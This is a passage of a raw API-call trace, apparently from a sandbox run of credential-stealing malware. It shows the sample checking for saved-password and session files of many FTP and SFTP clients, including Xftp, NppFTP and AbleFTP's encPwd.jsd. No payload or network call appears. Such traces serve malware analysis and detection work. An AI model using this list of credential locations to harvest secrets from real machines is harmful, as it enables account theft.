0x6a8db8 [0146.385] GetProcessHeap () returned 0x690000 [0146.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.386] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0146.386] GetProcessHeap () returned 0x690000 [0146.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.387] GetProcessHeap () returned 0x690000 [0146.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.413] GetProcessHeap () returned 0x690000 [0146.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.414] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.415] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.415] GetProcessHeap () returned 0x690000 [0146.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6ab2f8 [0146.416] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.417] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0146.417] GetProcessHeap () returned 0x690000 [0146.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6a8db8 [0146.417] GetProcessHeap () returned 0x690000 [0146.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.418] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0146.419] GetProcessHeap () returned 0x690000 [0146.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.419] GetProcessHeap () returned 0x690000 [0146.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.419] GetProcessHeap () returned 0x690000 [0146.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f9a) returned 0x6ab2f8 [0146.420] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.421] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0146.421] GetProcessHeap () returned 0x690000 [0146.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa4) returned 0x6aa2c8 [0146.421] GetProcessHeap () returned 0x690000 [0146.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.425] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0146.425] GetProcessHeap () returned 0x690000 [0146.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.426] GetProcessHeap () returned 0x690000 [0146.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.426] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.427] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.427] GetProcessHeap () returned 0x690000 [0146.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f74) returned 0x6ab2f8 [0146.428] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.436] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0146.436] GetProcessHeap () returned 0x690000 [0146.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0146.436] GetProcessHeap () returned 0x690000 [0146.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.438] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0146.438] GetProcessHeap () returned 0x690000 [0146.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.438] GetProcessHeap () returned 0x690000 [0146.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.439] GetProcessHeap () returned 0x690000 [0146.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6ab2f8 [0146.440] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.441] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTPBox\\profiles.conf", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0146.441] GetProcessHeap () returned 0x690000 [0146.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x78) returned 0x6a7970 [0146.441] GetProcessHeap () returned 0x690000 [0146.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.443] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0146.443] GetProcessHeap () returned 0x690000 [0146.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7970 | out: hHeap=0x690000) returned 1 [0146.443] GetProcessHeap () returned 0x690000 [0146.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.444] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.449] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.449] GetProcessHeap () returned 0x690000 [0146.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f94) returned 0x6ab2f8 [0146.450] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.451] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0146.451] GetProcessHeap () returned 0x690000 [0146.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.451] GetProcessHeap () returned 0x690000 [0146.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.453] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0146.453] GetProcessHeap () returned 0x690000 [0146.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.454] GetProcessHeap () returned 0x690000 [0146.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.457] GetProcessHeap () returned 0x690000 [0146.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.458] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.459] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.459] GetProcessHeap () returned 0x690000 [0146.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f68) returned 0x6ab2f8 [0146.459] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.460] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0146.460] GetProcessHeap () returned 0x690000 [0146.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x54) returned 0x6a8db8 [0146.460] GetProcessHeap () returned 0x690000 [0146.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.463] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0146.463] GetProcessHeap () returned 0x690000 [0146.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.464] GetProcessHeap () returned 0x690000 [0146.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.464] GetProcessHeap () returned 0x690000 [0146.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.465] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.465] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.466] GetProcessHeap () returned 0x690000 [0146.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f82) returned 0x6ab2f8 [0146.469] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.470] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0146.470] GetProcessHeap () returned 0x690000 [0146.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6a8db8 [0146.470] GetProcessHeap () returned 0x690000 [0146.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.472] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0146.472] GetProcessHeap () returned 0x690000 [0146.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.472] GetProcessHeap () returned 0x690000 [0146.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.473] GetProcessHeap () returned 0x690000 [0146.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6ab2f8 [0146.474] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.475] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0146.475] GetProcessHeap () returned 0x690000 [0146.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6a8db8 [0146.475] GetProcessHeap () returned 0x690000 [0146.475] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.476] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0146.477] GetProcessHeap () returned 0x690000 [0146.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.477] GetProcessHeap () returned 0x690000 [0146.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.478] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.478] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0146.478] GetProcessHeap () returned 0x690000 [0146.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f74) returned 0x6ab2f8 [0146.479] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.486] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0146.486] GetProcessHeap () returned 0x690000 [0146.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a6ff0 [0146.486] GetProcessHeap () returned 0x690000 [0146.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.488] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0146.488] GetProcessHeap () returned 0x690000 [0146.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.488] GetProcessHeap () returned 0x690000 [0146.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ff0 | out: hHeap=0x690000) returned 1 [0146.489] GetProcessHeap () returned 0x690000 [0146.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.489] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.490] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0146.490] GetProcessHeap () returned 0x690000 [0146.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f74) returned 0x6ab2f8 [0146.491] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.492] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0146.492] GetProcessHeap () returned 0x690000 [0146.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6a8db8 [0146.492] GetProcessHeap () returned 0x690000 [0146.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.493] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0146.494] GetProcessHeap () returned 0x690000 [0146.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.494] GetProcessHeap () returned 0x690000 [0146.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.509] GetProcessHeap () returned 0x690000 [0146.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.510] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.510] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.510] GetProcessHeap () returned 0x690000 [0146.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6ab2f8 [0146.511] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.512] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\EasyFTP\\data", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0146.512] GetProcessHeap () returned 0x690000 [0146.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x6a8db8 [0146.512] GetProcessHeap () returned 0x690000 [0146.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.514] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0146.514] GetProcessHeap () returned 0x690000 [0146.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.514] GetProcessHeap () returned 0x690000 [0146.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.515] GetProcessHeap () returned 0x690000 [0146.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6aa2c8 [0146.515] GetProcessHeap () returned 0x690000 [0146.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b5c0 [0146.515] GetProcessHeap () returned 0x690000 [0146.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab2f8 [0146.515] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.516] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6ab2f8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0146.516] GetProcessHeap () returned 0x690000 [0146.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6ab508 [0146.517] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.517] wvsprintfW (in: param_1=0x6ab508, param_2="%s\\SftpNetDrive", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0146.517] GetProcessHeap () returned 0x690000 [0146.518] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x68) returned 0x6a8db8 [0146.518] GetProcessHeap () returned 0x690000 [0146.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab508 | out: hHeap=0x690000) returned 1 [0146.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.519] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0146.523] GetProcessHeap () returned 0x690000 [0146.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.524] GetProcessHeap () returned 0x690000 [0146.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.524] GetProcessHeap () returned 0x690000 [0146.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.524] GetProcessHeap () returned 0x690000 [0146.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b5c0 | out: hHeap=0x690000) returned 1 [0146.525] GetProcessHeap () returned 0x690000 [0146.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.525] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.526] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0146.526] GetProcessHeap () returned 0x690000 [0146.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.526] GetProcessHeap () returned 0x690000 [0146.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.528] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0146.528] GetProcessHeap () returned 0x690000 [0146.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.529] GetProcessHeap () returned 0x690000 [0146.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.531] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.532] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.532] GetProcessHeap () returned 0x690000 [0146.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.533] GetProcessHeap () returned 0x690000 [0146.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.535] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.535] GetProcessHeap () returned 0x690000 [0146.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.535] GetProcessHeap () returned 0x690000 [0146.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.536] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.537] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.537] GetProcessHeap () returned 0x690000 [0146.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.537] GetProcessHeap () returned 0x690000 [0146.538] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.539] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.540] GetProcessHeap () returned 0x690000 [0146.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.540] GetProcessHeap () returned 0x690000 [0146.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.541] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.542] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0146.542] GetProcessHeap () returned 0x690000 [0146.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.542] GetProcessHeap () returned 0x690000 [0146.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.544] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0146.544] GetProcessHeap () returned 0x690000 [0146.544] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.544] GetProcessHeap () returned 0x690000 [0146.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.545] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.546] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.546] GetProcessHeap () returned 0x690000 [0146.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.547] GetProcessHeap () returned 0x690000 [0146.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.548] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.548] GetProcessHeap () returned 0x690000 [0146.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.548] GetProcessHeap () returned 0x690000 [0146.548] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.549] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.551] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.551] GetProcessHeap () returned 0x690000 [0146.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.551] GetProcessHeap () returned 0x690000 [0146.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.553] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.553] GetProcessHeap () returned 0x690000 [0146.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.553] GetProcessHeap () returned 0x690000 [0146.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.554] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.555] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0146.555] GetProcessHeap () returned 0x690000 [0146.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 0x6a8db8 [0146.555] GetProcessHeap () returned 0x690000 [0146.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.556] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0146.557] GetProcessHeap () returned 0x690000 [0146.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.557] GetProcessHeap () returned 0x690000 [0146.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.558] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.559] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | 